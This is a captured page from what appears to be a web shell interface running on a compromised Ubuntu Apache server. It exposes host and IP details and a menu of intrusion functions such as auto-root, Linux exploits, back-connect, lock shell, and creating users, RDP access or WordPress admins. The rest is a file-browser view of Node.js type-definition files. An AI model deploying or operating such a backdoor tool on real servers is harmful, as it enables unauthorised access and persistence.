Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cqt /
node_modules /
@types /
node /
[ HOME SHELL ]
Name
Size
Permission
Action
assert
[ DIR ]
drwxr-xr-x
compatibility
[ DIR ]
drwxr-xr-x
dns
[ DIR ]
drwxr-xr-x
fs
[ DIR ]
drwxr-xr-x
readline
[ DIR ]
drwxr-xr-x
stream
[ DIR ]
drwxr-xr-x
timers
[ DIR ]
drwxr-xr-x
ts5.6
[ DIR ]
drwxr-xr-x
LICENSE
1.11
KB
-rw-r--r--
README.md
1.5
KB
-rw-r--r--
assert.d.ts
43.57
KB
-rw-r--r--
async_hooks.d.ts
24.95
KB
-rw-r--r--
buffer.buffer.d.ts
21.89
KB
-rw-r--r--
buffer.d.ts
86.25
KB
-rw-r--r--
child_process.d.ts
68.12
KB
-rw-r--r--
cluster.d.ts
27.36
KB
-rw-r--r--
console.d.ts
20.75
KB
-rw-r--r--
constants.d.ts
816
B
-rw-r--r--
crypto.d.ts
185.42
KB
-rw-r--r--
dgram.d.ts
27.33
KB
-rw-r--r--
diagnostics_channel.d.ts
24.63
KB
-rw-r--r--
dns.d.ts
36.01
KB
-rw-r--r--
dom-events.d.ts
2.95
KB
-rw-r--r--
domain.d.ts
7.63
KB
-rw-r--r--
events.d.ts
42.13
KB
-rw-r--r--
fs.d.ts
184.8
KB
-rw-r--r--
globals.d.ts
13.37
KB
-rw-r--r--
globals.typedarray.d.ts
777
B
-rw-r--r--
http.d.ts
89.25
KB
-rw-r--r--
http2.d.ts
126.06
KB
-rw-r--r--
https.d.ts
24.23
KB
-rw-r--r--
index.d.ts
3.78
KB
-rw-r--r--
inspector.d.ts
194.19
KB
-rw-r--r--
module.d.ts
38.51
KB
-rw-r--r--
net.d.ts
46.59
KB
-rw-r--r--
os.d.ts
18.51
KB
-rw-r--r--
package.json
4.17
KB
-rw-r--r--
path.d.ts
8.04
KB
-rw-r--r--
perf_hooks.d.ts
37.68
KB
-rw-r--r--
process.d.ts
103.25
KB
-rw-r--r--
punycode.d.ts
5.35
KB
-rw-r--r--
querystring.d.ts
6.96
KB
-rw-r--r--
readline.d.ts
25.27
KB
-rw-r--r--
repl.d.ts
19
KB
-rw-r--r--
sea.d.ts
6.05
KB
-rw-r--r--
sqlite.d.ts
33.63
KB
-rw-r--r--
stream.d.ts
83.17
KB
-rw-r--r--
string_decoder.d.ts
2.76
KB
-rw-r--r--
test.d.ts
99.23
KB
-rw-r--r--
timers.d.ts
14.29
KB
-rw-r--r--
tls.d.ts
58.41
KB
-rw-r--r--
trace_events.d.ts
8.72
KB
-rw-r--r--
tty.d.ts
9.82
KB
-rw-r--r--
url.d.ts
41.7
KB
-rw-r--r--
util.d.ts
96.61
KB
-rw-r--r--
v8.d.ts
37.81
KB
-rw-r--r--
vm.d.ts
45.95
KB
-rw-r--r--
wasi.d.ts
7.75
KB
-rw-r--r--
worker_threads.d.ts
36.37
KB
-rw-r--r--
zlib.d.ts
25.18
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.d.ts
/** * License for programmatically and manually incorporated * documentation aka. `JSDoc` from https://github.com/nodejs/node/tree/master/doc * * Copyright Node.js contributors. All rights reserved. * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to * deal in the Software without restriction, including without limitation the * rights to use, copy, modify, merge, publish, distribute, sublicense, and/or * sell copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS * IN THE SOFTWARE. */ // NOTE: These definitions support Node.js and TypeScript 5.7+. // Reference required TypeScript libs: /// <reference lib="es2020" /> // TypeScript backwards-compatibility definitions: /// <reference path="compatibility/index.d.ts" /> // Definitions specific to TypeScript 5.7+: /// <reference path="globals.typedarray.d.ts" /> /// <reference path="buffer.buffer.d.ts" /> // Definitions for Node.js modules that are not specific to any version of TypeScript: /// <reference path="globals.d.ts" /> /// <reference path="assert.d.ts" /> /// <reference path="assert/strict.d.ts" /> /// <reference path="async_hooks.d.ts" /> /// <reference path="buffer.d.ts" /> /// <reference path="child_process.d.ts" /> /// <reference path="cluster.d.ts" /> /// <reference path="console.d.ts" /> /// <reference path="constants.d.ts" /> /// <reference path="crypto.d.ts" /> /// <reference path="dgram.d.ts" /> /// <reference path="diagnostics_channel.d.ts" /> /// <reference path="dns.d.ts" /> /// <reference path="dns/promises.d.ts" /> /// <reference path="dns/promises.d.ts" /> /// <reference path="domain.d.ts" /> /// <reference path="dom-events.d.ts" /> /// <reference path="events.d.ts" /> /// <reference path="fs.d.ts" /> /// <reference path="fs/promises.d.ts" /> /// <reference path="http.d.ts" /> /// <reference path="http2.d.ts" /> /// <reference path="https.d.ts" /> /// <reference path="inspector.d.ts" /> /// <reference path="module.d.ts" /> /// <reference path="net.d.ts" /> /// <reference path="os.d.ts" /> /// <reference path="path.d.ts" /> /// <reference path="perf_hooks.d.ts" /> /// <reference path="process.d.ts" /> /// <reference path="punycode.d.ts" /> /// <reference path="querystring.d.ts" /> /// <reference path="readline.d.ts" /> /// <reference path="readline/promises.d.ts" /> /// <reference path="repl.d.ts" /> /// <reference path="sea.d.ts" /> /// <reference path="sqlite.d.ts" /> /// <reference path="stream.d.ts" /> /// <reference path="stream/promises.d.ts" /> /// <reference path="stream/consumers.d.ts" /> /// <reference path="stream/web.d.ts" /> /// <reference path="string_decoder.d.ts" /> /// <reference path="test.d.ts" /> /// <reference path="timers.d.ts" /> /// <reference path="timers/promises.d.ts" /> /// <reference path="tls.d.ts" /> /// <reference path="trace_events.d.ts" /> /// <reference path="tty.d.ts" /> /// <reference path="url.d.ts" /> /// <reference path="util.d.ts" /> /// <reference path="v8.d.ts" /> /// <reference path="vm.d.ts" /> /// <reference path="wasi.d.ts" /> /// <reference path="worker_threads.d.ts" /> /// <reference path="zlib.d.ts" />
Close